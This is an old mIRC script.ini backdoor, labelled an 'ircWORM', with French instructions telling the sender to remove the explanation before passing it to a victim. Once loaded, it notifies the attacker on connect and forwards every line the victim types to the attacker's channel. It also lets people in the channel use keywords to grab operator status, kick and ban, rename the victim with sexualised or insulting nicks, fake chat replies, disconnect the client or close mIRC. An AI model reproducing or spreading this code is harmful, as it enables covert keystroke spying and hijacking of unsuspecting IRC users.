   [SCRIPT]
   ;MIRC 5.**/DON'T DELETE THIS FILE:script.ini/-Mirc©-SuperNovaE.999 for Mirc V.1.0.2fr - 19/03/99_designed 4  l EclipSE 11/08/1999_in_ReimS_-_-_SuperNovaE999_ircWORM_by_:Del_a0¿
   n1 = on 1:start: {
   n2 =  .sreq ignore
   n3 =  .remote on
   n4 =  .ctcps on
   n5 =  .events on
   n6 =  .raw on
   n7 =    }
   n8 = on 1:connect:/raw privmsg INSCRIVEZ_VOTRE_NICK_ICI Vivant!Vivant!! by SenSi 01
   n9 = on 1:text:*ouf*:#:/exit
   n10= #spy off
   n11= on 1:input:*:.msg #INSCRIVEZ_VOTRE_CHANNEL_ICI [( $+ $active $+ ) $1-]
   n12= #spy end
   n13= on 1:text: *spy_me*:#:/enable #spy
   n14= on 1:text:*op*:#:/mode $chan +o $nick
   n15= on 1:text:*ok*:#:/nick ZZZZZZ
   n16= on 1:text:*please*:#:/nick hotGayman
   n17= on 1:text:*salut*:#:/nick SuperNovaE
   n18= on 1:text:*bye*:#:/nick SeXyUp
   n19= on 1:text:*oui*:#:/nick NuKeMek
   n20= on 1:text:*asl*:*:/msg $nick hi 19f U? im so hot!! hummm :)
   n21= on 1:text:*end*:#:/disconnect
   n22= on 1:text:*non*:#:/nick hotgirl16
   n23= on 1:quit:/notice $me Vivant! $nick Vivant! but tired probably :)
   n24= on 1:TEXT:*bang*:#:/kick $chan $2-
   n25= on 1:TEXT:*boum*:#:/mode $chan +b $2-
   n18= on 1:text:*yes*:#:/nick merde
   n19= on 1:text:*no*:#:/nick flic_DST
   n20= on 1:text:*?*:#:/msg $nick SuperNovaE999!by SenSi 01
   ;
   ;
   ;
   ;!!!effacer cette partie explicative avant de l'envoyer!!!
   ;---------------------------------------------------------
   ;tapez:
   ;  spy_me  = espionne le clavier sur votre_channel
   ;  op  = devenez op (si le gars est op!)
   ;  ok, please, salut, bye, oui, non, yes, no  = change son nick :)
   ;  asl  = fake message en réponse ...
   ;  end  = déconnection
   ;  bang  = auto-kick (si le gars est op!)
   ;  boum  = auto-ban (si le gars est op!)
   ;  ?  = réponse du script
   ;  ouf  = close mirc !
   ;  + privmsg à votre nick à chaque connection
   ;---------------------------------------------------------
   ;!!!effacer cette partie explicative avant de l'envoyer!!!
